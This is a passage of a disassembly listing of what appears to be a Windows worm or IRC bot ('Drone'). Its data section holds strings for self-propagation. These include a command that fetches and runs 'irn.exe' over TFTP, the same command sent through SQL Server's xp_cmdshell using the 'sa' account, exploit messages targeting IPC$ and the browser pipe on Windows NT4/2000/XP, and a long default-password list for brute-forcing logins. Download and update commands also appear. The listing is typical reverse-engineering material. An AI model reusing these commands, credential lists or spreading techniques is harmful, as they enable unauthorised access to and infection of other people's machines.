asc_41EA70 db '<=',0 ; DATA XREF: .kSjx934:0041EBDC�o
align 4
asc_41EA74: ; DATA XREF: .kSjx934:0041EBD8�o
dw 3Ch
unicode 0, <>,0
asc_41EA78: ; DATA XREF: .kSjx934:0041EBD4�o
unicode 0, <%>,0
asc_41EA7C: ; DATA XREF: .kSjx934:0041EBD0�o
unicode 0, </>,0
asc_41EA80 db '->*',0 ; DATA XREF: .kSjx934:0041EBCC�o
asc_41EA84: ; DATA XREF: .kSjx934:0041EBC8�o
unicode 0, <&>,0
asc_41EA88: ; DATA XREF: .kSjx934:0041EBC4�o
unicode 0, <+>,0
asc_41EA8C: ; DATA XREF: .kSjx934:0041EBC0�o
unicode 0, <->,0
asc_41EA90 db '--',0 ; DATA XREF: .kSjx934:0041EBBC�o
align 4
asc_41EA94 db '++',0 ; DATA XREF: .kSjx934:0041EBB8�o
align 4
asc_41EA98: ; DATA XREF: .kSjx934:0041EBB4�o
unicode 0, <*>,0
asc_41EA9C db '->',0 ; DATA XREF: .kSjx934:0041EBB0�o
align 10h
aOperator db 'operator',0 ; DATA XREF: .kSjx934:0041EBAC�o
align 4
asc_41EAAC db '[]',0 ; DATA XREF: .kSjx934:0041EBA8�o
align 10h
asc_41EAB0 db '!=',0 ; DATA XREF: .kSjx934:0041EBA4�o
align 4
asc_41EAB4 db '==',0 ; DATA XREF: .kSjx934:0041EBA0�o
align 4
asc_41EAB8: ; DATA XREF: .kSjx934:0041EB9C�o
unicode 0, <!>,0
asc_41EABC db '<<',0 ; DATA XREF: .kSjx934:0041EB98�o
align 10h
asc_41EAC0 db '>>',0 ; DATA XREF: .kSjx934:0041EB94�o
align 4
aDelete_0 db ' delete',0 ; DATA XREF: .kSjx934:0041EB8C�o
aNew_0 db ' new',0 ; DATA XREF: .kSjx934:0041EB88�o
align 4
a__unaligned db '__unaligned',0 ; DATA XREF: .kSjx934:0041EB6C�o
a__restrict db '__restrict',0 ; DATA XREF: .kSjx934:0041EB68�o
align 4
; a__ptr64
a__ptr64 db '__ptr64',0 ; DATA XREF: .kSjx934:0041EB64�o
a__clrcall db '__clrcall',0 ; DATA XREF: .kSjx934:0041EB60�o
align 10h
a__fastcall db '__fastcall',0 ; DATA XREF: .kSjx934:0041EB5C�o
align 4
a__thiscall db '__thiscall',0 ; DATA XREF: .kSjx934:0041EB58�o
align 4
a__stdcall db '__stdcall',0 ; DATA XREF: .kSjx934:0041EB54�o
align 4
a__pascal db '__pascal',0 ; DATA XREF: .kSjx934:0041EB50�o
align 10h
a__cdecl db '__cdecl',0 ; DATA XREF: .kSjx934:0041EB4C�o
a__based db '__based(',0 ; DATA XREF: .kSjx934:0041EB48�o
align 8
dd offset a__based ; "__based("
dd offset a__cdecl ; "__cdecl"
dd offset a__pascal ; "__pascal"
dd offset a__stdcall ; "__stdcall"
dd offset a__thiscall ; "__thiscall"
dd offset a__fastcall ; "__fastcall"
dd offset a__clrcall ; "__clrcall"
dd offset a__ptr64 ; "__ptr64"
dd offset a__restrict ; "__restrict"
dd offset a__unaligned ; "__unaligned"
dd offset word_41D482
dd offset aTypeDescriptor ; " Type Descriptor'"
dd offset aBaseClassDescr ; " Base Class Descriptor at ("
dd offset aBaseClassArray ; " Base Class Array'"
dd offset aClassHierarchy ; " Class Hierarchy Descriptor'"
dd offset aCompleteObject ; " Complete Object Locator'"
dd offset aNew_0 ; " new"
dd offset aDelete_0 ; " delete"
dd offset byte_41D480
dd offset asc_41EAC0 ; ">>"
dd offset asc_41EABC ; "<<"
dd offset asc_41EAB8 ; "!"
dd offset asc_41EAB4 ; "=="
dd offset asc_41EAB0 ; "!="
dd offset asc_41EAAC ; "[]"
dd offset aOperator ; "operator"
dd offset asc_41EA9C ; "->"
dd offset asc_41EA98 ; "*"
dd offset asc_41EA94 ; "++"
dd offset asc_41EA90 ; "--"
dd offset asc_41EA8C ; "-"
dd offset asc_41EA88 ; "+"
dd offset asc_41EA84 ; "&"
dd offset asc_41EA80 ; "->*"
dd offset asc_41EA7C ; "/"
dd offset asc_41EA78 ; "%"
dd offset asc_41EA74 ; "<"
dd offset asc_41EA70 ; "<="
dd offset asc_41EA6C ; ">"
dd offset asc_41EA68 ; ">="
dd offset asc_41EA64 ; ","
dd offset asc_41EA60 ; "()"
dd offset asc_41EA5C ; "~"
dd offset asc_41EA58 ; "^"
dd offset asc_41EA54 ; "|"
dd offset asc_41EA50 ; "&&"
dd offset asc_41EA4C ; "||"
dd offset asc_41EA48 ; "*="
dd offset asc_41EA44 ; "+="
dd offset asc_41EA40 ; "-="
dd offset asc_41EA3C ; "/="
dd offset asc_41EA38 ; "%="
dd offset asc_41EA34 ; ">>="
dd offset asc_41EA30 ; "<<="
dd offset asc_41EA2C ; "&="
dd offset asc_41EA28 ; "|="
dd offset asc_41EA24 ; "^="
dd offset aVftable ; "`vftable'"
dd offset aVbtable ; "`vbtable'"
dd offset aVcall ; "`vcall'"
dd offset aTypeof ; "`typeof'"
dd offset aLocalStaticGua ; "`local static guard'"
dd offset aString ; "`string'"
dd offset aVbaseDestructo ; "`vbase destructor'"
dd offset aVectorDeleting ; "`vector deleting destructor'"
dd offset aDefaultConstru ; "`default constructor closure'"
dd offset aScalarDeleting ; "`scalar deleting destructor'"
dd offset aVectorConstruc ; "`vector constructor iterator'"
dd offset aVectorDestruct ; "`vector destructor iterator'"
dd offset aVectorVbaseCon ; "`vector vbase constructor iterator'"
dd offset aVirtualDisplac ; "`virtual displacement map'"
dd offset aEhVectorConstr ; "`eh vector constructor iterator'"
dd offset aEhVectorDestru ; "`eh vector destructor iterator'"
dd offset aEhVectorVbas_0 ; "`eh vector vbase constructor iterator'"
dd offset aCopyConstructo ; "`copy constructor closure'"
dd offset aUdtReturning ; "`udt returning'"
dd offset aEh ; "`EH"
dd offset aRtti ; "`RTTI"
dd offset aLocalVftable ; "`local vftable'"
dd offset aLocalVftableCo ; "`local vftable constructor closure'"
dd offset aNew ; " new[]"
dd offset aDelete ; " delete[]"
dd offset aOmniCallsig ; "`omni callsig'"
dd offset aPlacementDel_0 ; "`placement delete closure'"
dd offset aPlacementDelet ; "`placement delete[] closure'"
dd offset aManagedVecto_0 ; "`managed vector constructor iterator'"
dd offset aManagedVectorD ; "`managed vector destructor iterator'"
dd offset aEhVectorCopyCo ; "`eh vector copy constructor iterator'"
dd offset aEhVectorVbaseC ; "`eh vector vbase copy constructor itera"...
dd offset aDynamicInitial ; "`dynamic initializer for '"
dd offset aDynamicAtexitD ; "`dynamic atexit destructor for '"
dd offset aVectorCopyCons ; "`vector copy constructor iterator'"
dd offset aVectorVbaseCop ; "`vector vbase copy constructor iterator"...
dd offset aManagedVectorC ; "`managed vector copy constructor iterat"...
dd offset aLocalStaticThr ; "`local static thread guard'"
dd offset word_41D482
dd 86808006h, 808180h, 86031000h, 80828680h, 45050514h
dd 85854545h, 585h, 50803030h, 8008880h, 38272800h, 805750h
dd 30370007h, 88505030h, 20000000h, 80888028h, 80h
aHHhhXppwpp db '`h`hhh',8,8,7,'xppwpp',8,8,0
dw 800h
dd 7000800h, 8
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_40F524+C1�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_40F524+A9�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_40F524+6D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_40F524+58�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_40F524+46�o
aUser32_dll_0 db 'USER32.DLL',0 ; DATA XREF: sub_40F524+28�o
align 4
off_41ED94 dd offset sub_40F76B ; DATA XREF: sub_407979�r sub_407979+9�o ...
dd offset nullsub_2
dd offset nullsub_2
a_nextafter db '_nextafter',0
align 4
a_logb db '_logb',0
align 4
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 10h
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 10h
aLdexp db 'ldexp',0
align 4
aFabs db 'fabs',0
align 10h
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aTanh db 'tanh',0
align 4
aCosh db 'cosh',0
align 10h
aSinh db 'sinh',0
align 4
dbl_41EE18 dq 0.0 ; DATA XREF: sub_40FB20+143�r
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 10h
aE000 db 'e+000',0 ; DATA XREF: sub_410A54:loc_410B2C�o
align 4
dbl_41EE68 dq 4.195835e6 ; DATA XREF: sub_411394+F�r
dbl_41EE70 dq 3.145727e6 ; DATA XREF: sub_411394+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_4113D0+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_4113D0�o
align 10h
aConout db 'CONOUT$',0 ; DATA XREF: sub_41142B+E�o
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_412AB1:loc_412BE0�o
align 10h
a1Inf db '1#INF',0 ; DATA XREF: sub_412AB1+103�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: sub_412AB1+F4�o
align 10h
a1Snan db '1#SNAN',0 ; DATA XREF: sub_412AB1+DC�o
align 4
aBadAllocation db 'bad allocation',0 ; DATA XREF: .kSjx934:00424520�o
align 4
aScan_start db 'scan.start',0 ; DATA XREF: .kSjx934:0041C445�o
align 4
aScan_stop db 'scan.stop',0 ; DATA XREF: .kSjx934:0041C461�o
byte_41EEEE db 0 ; DATA XREF: sub_41A9DE+9C�o
byte_41EEEF db 0 ; DATA XREF: sub_41A9DE+A8�o
dword_41EEF0 dd 6E616373h, 6174732Eh, 7374h ; DATA XREF: .kSjx934:0041C47D�o
dword_41EEFC dd 252E6425h, 64252E64h, 64252Eh ; DATA XREF: .kSjx934:00413A77�o
byte_41EF08 db 25h, 73h, 0 ; DATA XREF: .kSjx934:00413BB9�o
byte_41EF0B db 0 ; DATA XREF: .kSjx934:off_424650�o
byte_41EF0C db 25h, 73h, 0 ; DATA XREF: .kSjx934:00413CC9�o
byte_41EF0F db 0 ; DATA XREF: .kSjx934:0041BB02�o
dword_41EF10 dd 7325h ; DATA XREF: .kSjx934:00413DB3�o
byte_41EF14 db 25h, 73h, 0 ; DATA XREF: .kSjx934:00413EC2�o
byte_41EF17 db 0 ; DATA XREF: .kSjx934:loc_41C061�o
dword_41EF18 dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh ; DATA XREF: .kSjx934:00424524�o
aTftpISGetIrn_e db 'tftp -i %s GET irn.exe&start irn.exe&exit',0Dh,0Ah,0
aBadAllocatio_0 db 'bad allocation',0 ; DATA XREF: .kSjx934:004245D8�o
align 4
dword_41EF64 dd 5C0D0A00h ; DATA XREF: sub_41A5C1+1F�r
dword_41EF68 dd 2E2F5Fh ; DATA XREF: sub_41A5C1+27�r
dword_41EF6C dd 0 ; DATA XREF: sub_41A5C1+2C�o
dword_41EF70 dd 0 ; DATA XREF: sub_41A5C1+51�o
aHttpSDS db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A5C1+F1�o
aHttpSDS_0 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A5C1+162�o
aBadAllocatio_1 db 'bad allocation',0
align 4
aWindowsNt42000 db 'Windows NT4, 2000 (SP0-SP4)',0
aWindowsXpSp0Sp db 'Windows XP (SP0+SP1)',0 ; DATA XREF: .kSjx934:00424634�o
align 4
aIpc:
unicode 0, <\IPC$>,0
unicode 0, <\\>,0
align 4
dd 2 dup(0)
aIpc_0:
unicode 0, <\IPC$>,0
unicode 0, <\\>,0
align 4
a_: ; DATA XREF: sub_41A9DE+57�o
unicode 0, <.>,0
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_41A9DE+76�o
align 4
aSPipeBrowser db '\\%s\pipe\browser',0 ; DATA XREF: sub_41A9DE+CA�o
align 4
dword_41F02C dd 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 0 ; DATA XREF: sub_41A9DE+191�o
dword_41F040 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 3 dup(0)
; DATA XREF: sub_41A9DE+1AC�o
dd 2EBh, 0
aHttpSDS_1 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A9DE+3D3�o
aHttpSDS_2 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A9DE+451�o
aSExploitedS_ db '%s: Exploited: %s.',0 ; DATA XREF: sub_41A9DE+786�o
align 4
aBadAllocatio_2 db 'bad allocation',0 ; DATA XREF: .kSjx934:00424648�o
align 4
aSa db 'sa',0 ; DATA XREF: sub_41B1A0+55�o
align 4
aRoot db 'root',0 ; DATA XREF: sub_41B1A0+5C�o
align 4
aAdmin db 'admin',0 ; DATA XREF: sub_41B1A0+63�o
align 4
aDriverSqlServe db 'DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s',0
; DATA XREF: sub_41B1A0+10C�o
align 10h
; aExecMaster(long long, *)
aExecMaster__xp db 'EXEC master..xp_cmdshell ',27h,'tftp -i %s GET irn.exe&start irn.exe'
; DATA XREF: sub_41B1A0+197�o
db '&exit',0Dh,0Ah
db 27h,0
align 4
aSExploitedS__0 db '%s: Exploited %s.',0 ; DATA XREF: sub_41B1A0+1F1�o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: .kSjx934:00424654�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: .kSjx934:00424658�o
align 4
aAdministrateur db 'administrateur',0 ; DATA XREF: .kSjx934:0042465C�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: .kSjx934:00424660�o
aAdmins db 'admins',0 ; DATA XREF: .kSjx934:00424664�o
align 10h
aAdmin_0 db 'admin',0 ; DATA XREF: .kSjx934:00424668�o
align 4
aAdm db 'adm',0 ; DATA XREF: .kSjx934:0042466C�o
aPassword1 db 'password1',0 ; DATA XREF: .kSjx934:00424670�o
align 4
aPassword db 'password',0 ; DATA XREF: .kSjx934:00424674�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: .kSjx934:00424678�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: .kSjx934:0042467C�o
align 4
aPass db 'pass',0 ; DATA XREF: .kSjx934:00424680�o
align 10h
aPwd db 'pwd',0 ; DATA XREF: .kSjx934:00424684�o
a007 db '007',0 ; DATA XREF: .kSjx934:00424688�o
a1: ; DATA XREF: .kSjx934:0042468C�o
unicode 0, <1>,0
a12 db '12',0 ; DATA XREF: .kSjx934:00424690�o
align 10h
a123 db '123',0 ; DATA XREF: .kSjx934:00424694�o
a1234 db '1234',0 ; DATA XREF: .kSjx934:00424698�o
align 4
a12345 db '12345',0 ; DATA XREF: .kSjx934:0042469C�o
align 4
a123456 db '123456',0 ; DATA XREF: .kSjx934:004246A0�o
align 4
a1234567 db '1234567',0 ; DATA XREF: .kSjx934:004246A4�o
a12345678 db '12345678',0 ; DATA XREF: .kSjx934:004246A8�o
align 10h
a123456789 db '123456789',0 ; DATA XREF: .kSjx934:004246AC�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: .kSjx934:004246B0�o
align 4
a2000 db '2000',0 ; DATA XREF: .kSjx934:004246B4�o
align 10h
a2001 db '2001',0 ; DATA XREF: .kSjx934:004246B8�o
align 4
a2002 db '2002',0 ; DATA XREF: .kSjx934:004246BC�o
align 10h
a2003 db '2003',0 ; DATA XREF: .kSjx934:004246C0�o
align 4
a2004 db '2004',0 ; DATA XREF: .kSjx934:004246C4�o
align 10h
aTest db 'test',0 ; DATA XREF: .kSjx934:004246C8�o
align 4
aGuest db 'guest',0 ; DATA XREF: .kSjx934:004246CC�o
align 10h
aNone db 'none',0 ; DATA XREF: .kSjx934:004246D0�o
align 4
aDemo db 'demo',0 ; DATA XREF: .kSjx934:004246D4�o
align 10h
aUnix db 'unix',0 ; DATA XREF: .kSjx934:004246D8�o
align 4
aLinux db 'linux',0 ; DATA XREF: .kSjx934:004246DC�o
align 10h
aChangeme db 'changeme',0 ; DATA XREF: .kSjx934:004246E0�o
align 4
aDefault db 'default',0 ; DATA XREF: .kSjx934:004246E4�o
aSystem_0 db 'system',0 ; DATA XREF: .kSjx934:004246E8�o
align 4
aServer db 'server',0 ; DATA XREF: .kSjx934:004246EC�o
align 4
aRoot_0 db 'root',0 ; DATA XREF: .kSjx934:004246F0�o
align 4
aNull_1 db 'null',0 ; DATA XREF: .kSjx934:004246F4�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: .kSjx934:004246F8�o
align 4
aMail db 'mail',0 ; DATA XREF: .kSjx934:004246FC�o
align 4
aOutlook db 'outlook',0 ; DATA XREF: .kSjx934:00424700�o
aWeb db 'web',0 ; DATA XREF: .kSjx934:00424704�o
aWww db 'www',0 ; DATA XREF: .kSjx934:00424708�o
aInternet db 'internet',0 ; DATA XREF: .kSjx934:0042470C�o
align 10h
aAccounts db 'accounts',0 ; DATA XREF: .kSjx934:00424710�o
align 4
aAccounting db 'accounting',0 ; DATA XREF: .kSjx934:00424714�o
align 4
aHome db 'home',0 ; DATA XREF: .kSjx934:00424718�o
align 10h
aHomeuser db 'homeuser',0 ; DATA XREF: .kSjx934:0042471C�o
align 4
aUser db 'user',0 ; DATA XREF: .kSjx934:00424720�o
align 4
aOem db 'oem',0 ; DATA XREF: .kSjx934:00424724�o
aOemuser db 'oemuser',0 ; DATA XREF: .kSjx934:00424728�o
aOeminstall db 'oeminstall',0 ; DATA XREF: .kSjx934:0042472C�o
align 4
aWindows db 'windows',0 ; DATA XREF: .kSjx934:00424730�o
aWin98 db 'win98',0 ; DATA XREF: .kSjx934:00424734�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: .kSjx934:00424738�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: .kSjx934:0042473C�o
align 4
aWinnt db 'winnt',0 ; DATA XREF: .kSjx934:00424740�o
align 4
aWin2000 db 'win2000',0 ; DATA XREF: .kSjx934:00424744�o
aQaz db 'qaz',0 ; DATA XREF: .kSjx934:00424748�o
aAsd db 'asd',0 ; DATA XREF: .kSjx934:0042474C�o
aZxc db 'zxc',0 ; DATA XREF: .kSjx934:00424750�o
aQwe db 'qwe',0 ; DATA XREF: .kSjx934:00424754�o
aBob db 'bob',0 ; DATA XREF: .kSjx934:00424758�o
aJen db 'jen',0 ; DATA XREF: .kSjx934:0042475C�o
aJoe db 'joe',0 ; DATA XREF: .kSjx934:00424760�o
aFred db 'fred',0 ; DATA XREF: .kSjx934:00424764�o
align 10h
aBill db 'bill',0 ; DATA XREF: .kSjx934:00424768�o
align 4
aMike db 'mike',0 ; DATA XREF: .kSjx934:0042476C�o
align 10h
aJohn db 'john',0 ; DATA XREF: .kSjx934:00424770�o
align 4
aPeter db 'peter',0 ; DATA XREF: .kSjx934:00424774�o
align 10h
aLuke db 'luke',0 ; DATA XREF: .kSjx934:00424778�o
align 4
aSam db 'sam',0 ; DATA XREF: .kSjx934:0042477C�o
aSue db 'sue',0 ; DATA XREF: .kSjx934:00424780�o
aSusan db 'susan',0 ; DATA XREF: .kSjx934:00424784�o
align 4
aPeter_0 db 'peter',0 ; DATA XREF: .kSjx934:00424788�o
align 10h
aBrian db 'brian',0 ; DATA XREF: .kSjx934:0042478C�o
align 4
aLee db 'lee',0 ; DATA XREF: .kSjx934:00424790�o
aNeil db 'neil',0 ; DATA XREF: .kSjx934:00424794�o
align 4
aIan db 'ian',0 ; DATA XREF: .kSjx934:00424798�o
aChris db 'chris',0 ; DATA XREF: .kSjx934:0042479C�o
align 10h
aEric db 'eric',0 ; DATA XREF: .kSjx934:004247A0�o
align 4
aGeorge db 'george',0 ; DATA XREF: .kSjx934:004247A4�o
align 10h
aKate db 'kate',0 ; DATA XREF: .kSjx934:004247A8�o
align 4
aBob_0 db 'bob',0 ; DATA XREF: .kSjx934:004247AC�o
aKatie db 'katie',0 ; DATA XREF: .kSjx934:004247B0�o
align 4
aMary db 'mary',0 ; DATA XREF: .kSjx934:004247B4�o
align 4
aLogin db 'login',0 ; DATA XREF: .kSjx934:004247B8�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: .kSjx934:004247BC�o
align 10h
aTechnical db 'technical',0 ; DATA XREF: .kSjx934:004247C0�o
align 4
aBackup db 'backup',0 ; DATA XREF: .kSjx934:004247C4�o
align 4
aExchange db 'exchange',0 ; DATA XREF: .kSjx934:004247C8�o
align 10h
aFuck db 'fuck',0 ; DATA XREF: .kSjx934:004247CC�o
align 4
aBitch db 'bitch',0 ; DATA XREF: .kSjx934:004247D0�o
align 10h
aSlut db 'slut',0 ; DATA XREF: .kSjx934:004247D4�o
align 4
aSex db 'sex',0 ; DATA XREF: .kSjx934:004247D8�o
aGod db 'god',0 ; DATA XREF: .kSjx934:004247DC�o
aHell db 'hell',0 ; DATA XREF: .kSjx934:004247E0�o
align 4
aHello db 'hello',0 ; DATA XREF: .kSjx934:004247E4�o
align 10h
aDomain db 'domain',0 ; DATA XREF: .kSjx934:004247E8�o
align 4
aDomainpass db 'domainpass',0 ; DATA XREF: .kSjx934:004247EC�o
align 4
aDomainpassword db 'domainpassword',0 ; DATA XREF: .kSjx934:004247F0�o
align 4
aDatabase db 'database',0 ; DATA XREF: .kSjx934:004247F4�o
align 10h
aAccess db 'access',0 ; DATA XREF: .kSjx934:004247F8�o
align 4
aDbpass db 'dbpass',0 ; DATA XREF: .kSjx934:004247FC�o
align 10h
aDbpassword db 'dbpassword',0 ; DATA XREF: .kSjx934:00424800�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: .kSjx934:00424804�o
align 4
aData db 'data',0 ; DATA XREF: .kSjx934:00424808�o
align 4
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .kSjx934:0042480C�o
align 4
aDb1 db 'db1',0 ; DATA XREF: .kSjx934:00424810�o
aDb2 db 'db2',0 ; DATA XREF: .kSjx934:00424814�o
aDb1234 db 'db1234',0 ; DATA XREF: .kSjx934:00424818�o
align 4
aSa_0 db 'sa',0 ; DATA XREF: .kSjx934:0042481C�o
align 4
aSql db 'sql',0 ; DATA XREF: .kSjx934:00424820�o
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .kSjx934:00424824�o
align 4
aOrainstall db 'orainstall',0 ; DATA XREF: .kSjx934:00424828�o
align 10h
aOracle db 'oracle',0 ; DATA XREF: .kSjx934:0042482C�o
align 4
aIbm db 'ibm',0 ; DATA XREF: .kSjx934:00424830�o
aCisco db 'cisco',0 ; DATA XREF: .kSjx934:00424834�o
align 4
aDell db 'dell',0 ; DATA XREF: .kSjx934:00424838�o
align 4
aCompaq db 'compaq',0 ; DATA XREF: .kSjx934:0042483C�o
align 4
aSiemens db 'siemens',0 ; DATA XREF: .kSjx934:00424840�o
aHp db 'hp',0 ; DATA XREF: .kSjx934:00424844�o
align 10h
aNokia db 'nokia',0 ; DATA XREF: .kSjx934:00424848�o
align 4
aXp db 'xp',0 ; DATA XREF: .kSjx934:0042484C�o
align 4
aControl db 'control',0 ; DATA XREF: .kSjx934:00424850�o
aOffice db 'office',0 ; DATA XREF: .kSjx934:00424854�o
align 4
aBlank db 'blank',0 ; DATA XREF: .kSjx934:00424858�o
align 4
aWinpass db 'winpass',0 ; DATA XREF: .kSjx934:0042485C�o
aMain db 'main',0 ; DATA XREF: .kSjx934:00424860�o
align 4
aLan db 'lan',0 ; DATA XREF: .kSjx934:00424864�o
aInternet_0 db 'internet',0 ; DATA XREF: .kSjx934:00424868�o
align 4
aIntranet db 'intranet',0 ; DATA XREF: .kSjx934:0042486C�o
align 10h
aStudent db 'student',0 ; DATA XREF: .kSjx934:00424870�o
aTeacher db 'teacher',0 ; DATA XREF: .kSjx934:00424874�o
aStaff db 'staff',0 ; DATA XREF: .kSjx934:00424878�o
align 4
aBadAllocatio_3 db 'bad allocation',0 ; DATA XREF: .kSjx934:0042464C�o
align 4
aHardwareDescri db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
; DATA XREF: sub_41A391+21�o
align 4
aMhz db '~MHz',0 ; DATA XREF: sub_41A391+4A�o
align 10h
aProcessornames db 'ProcessorNameString',0 ; DATA XREF: sub_41A391+6D�o
aS_7 db '%s',0 ; DATA XREF: sub_41A391+AD�o
align 4
aSC_0 db '%s%c',0 ; DATA XREF: sub_41A391+112�o
align 10h
aUnknown db 'Unknown',0 ; DATA XREF: sub_41A391+165�o
aHardwareDesc_0 db 'HARDWARE\DESCRIPTION\System\CentralProcessor\%i',0
; DATA XREF: sub_41A391+1B7�o
aSysinfo db 'sysinfo',0 ; DATA XREF: .kSjx934:0041C3FF�o
aNetinfo db 'netinfo',0 ; DATA XREF: .kSjx934:0041C41B�o
aBadAllocatio_4 db 'bad allocation',0 ; DATA XREF: .kSjx934:00424880�o
align 4
aHttp db 'http',0 ; DATA XREF: .kSjx934:0041C3E3�o
align 10h
aBadAllocatio_5 db 'bad allocation',0 ; DATA XREF: .kSjx934:00424884�o
align 10h
aDl db 'DL',0
align 4
aDownload db 'download',0 ; DATA XREF: .kSjx934:0041C3AB�o
align 10h
aUpdate db 'update',0 ; DATA XREF: .kSjx934:0041C3C7�o
align 4
aMozilla5_0 db 'Mozilla/5.0',0 ; DATA XREF: .kSjx934:0041B958�o
aDlDownloadingS db 'DL: Downloading %s to %s',0 ; DATA XREF: .kSjx934:0041B976�o
align 10h
aDlFailedBadLoc db 'DL: Failed; Bad Location.',0 ; DATA XREF: .kSjx934:loc_41BAEF�o
align 4
aDlDownloadSIBy db 'DL: Download %s (%i Bytes) finished in %i seconds (%iKB/s)',0
; DATA XREF: .kSjx934:0041BA7B�o
align 4
aMainUninstalli db 'Main: Uninstalling Drone',0 ; DATA XREF: .kSjx934:0041BACC�o
align 4
aDlFailedToUpda db 'DL: Failed To Update',0 ; DATA XREF: .kSjx934:loc_41BAF6�o
align 4
aDlErrorExecuti db 'DL: Error Executing File.',0 ; DATA XREF: .kSjx934:0041BB12�o
align 4
aDlExecutedFile db 'DL: Executed File: %s',0 ; DATA XREF: .kSjx934:0041BB21�o
align 10h
aDlFailedBadUrl db 'DL: Failed; Bad URL',0 ; DATA XREF: .kSjx934:loc_41BB3D�o
aDlFailedWinine db 'DL: Failed; WinINET Error',0 ; DATA XREF: .kSjx934:loc_41BB44�o
align 10h
aBadAllocatio_6 db 'bad allocation',0 ; DATA XREF: .kSjx934:00424888�o
align 10h
aBadAllocatio_7 db 'bad allocation',0 ; DATA XREF: .kSjx934:0042488C�o
align 10h
aTftpServer db 'TFTP Server',0 ; DATA XREF: sub_41B775+5A�o
aRb db 'rb',0 ; DATA XREF: sub_41B3D0+44�o
align 10h
aTftpSendComple db 'TFTP: Send Complete To %s. %d Total Sends',0
; DATA XREF: sub_41B3D0+1A4�o
align 4
aBadAllocatio_8 db 'bad allocation',0 ; DATA XREF: .kSjx934:00424890�o
align 10h
dd 428A2F98h, 71374491h, 0B5C0FBCFh, 0E9B5DBA5h, 3956C25Bh
dd 59F111F1h, 923F82A4h, 0AB1C5ED5h, 0D807AA98h, 12835B01h
dd 243185BEh, 550C7DC3h, 72BE5D74h, 80DEB1FEh, 9BDC06A7h
dd 0C19BF174h, 0E49B69C1h, 0EFBE4786h, 0FC19DC6h, 240CA1CCh
dd 2DE92C6Fh, 4A7484AAh, 5CB0A9DCh, 76F988DAh, 983E5152h
dd 0A831C66Dh, 0B00327C8h, 0BF597FC7h, 0C6E00BF3h, 0D5A79147h
dd 6CA6351h, 14292967h, 27B70A85h, 2E1B2138h, 4D2C6DFCh
dd 53380D13h, 650A7354h, 766A0ABBh, 81C2C92Eh, 92722C85h
dd 0A2BFE8A1h, 0A81A664Bh, 0C24B8B70h, 0C76C51A3h, 0D192E819h
dd 0D6990624h, 0F40E3585h, 106AA070h, 19A4C116h, 1E376C08h
dd 2748774Ch, 34B0BCB5h, 391C0CB3h, 4ED8AA4Ah, 5B9CCA4Fh
dd 682E6FF3h, 748F82EEh, 78A5636Fh, 84C87814h, 8CC70208h
dd 90BEFFFAh, 0A4506CEBh, 0BEF9A3F7h, 0C67178F2h, 6A09E667h
dd 0BB67AE85h, 3C6EF372h, 0A54FF53Ah, 510E527Fh, 9B05688Ch
dd 1F83D9ABh, 5BE0CD19h
dword_41F950 dd 0D728AE22h ; DATA XREF: sub_4143D0+318�r
dword_41F954 dd 428A2F98h ; DATA XREF: sub_4143D0+31F�r
dword_41F958 dd 23EF65CDh ; DATA XREF: sub_4143D0+548�r
dword_41F95C dd 71374491h ; DATA XREF: sub_4143D0+54F�r
dword_41F960 dd 0EC4D3B2Fh ; DATA XREF: sub_4143D0+772�r
dword_41F964 dd 0B5C0FBCFh ; DATA XREF: sub_4143D0+779�r
dword_41F968 dd 8189DBBCh ; DATA XREF: sub_4143D0+9B8�r
dword_41F96C dd 0E9B5DBA5h ; DATA XREF: sub_4143D0+9BF�r
dword_41F970 dd 0F348B538h ; DATA XREF: sub_4143D0+BFE�r
dword_41F974 dd 3956C25Bh ; DATA XREF: sub_4143D0+C09�r
dword_41F978 dd 0B605D019h ; DATA XREF: sub_4143D0+E80�r
dword_41F97C dd 59F111F1h ; DATA XREF: sub_4143D0+E87�r
dword_41F980 dd 0AF194F9Bh ; DATA XREF: sub_4143D0+10D7�r
dword_41F984 dd 923F82A4h ; DATA XREF: sub_4143D0+10DE�r
dword_41F988 dd 0DA6D8118h ; DATA XREF: sub_4143D0+1319�r
dword_41F98C dd 0AB1C5ED5h ; DATA XREF: sub_4143D0+1320�r
dword_41F990 dd 0A3030242h ; DATA XREF: sub_4143D0+1569�r
dword_41F994 dd 0D807AA98h ; DATA XREF: sub_4143D0+1570�r
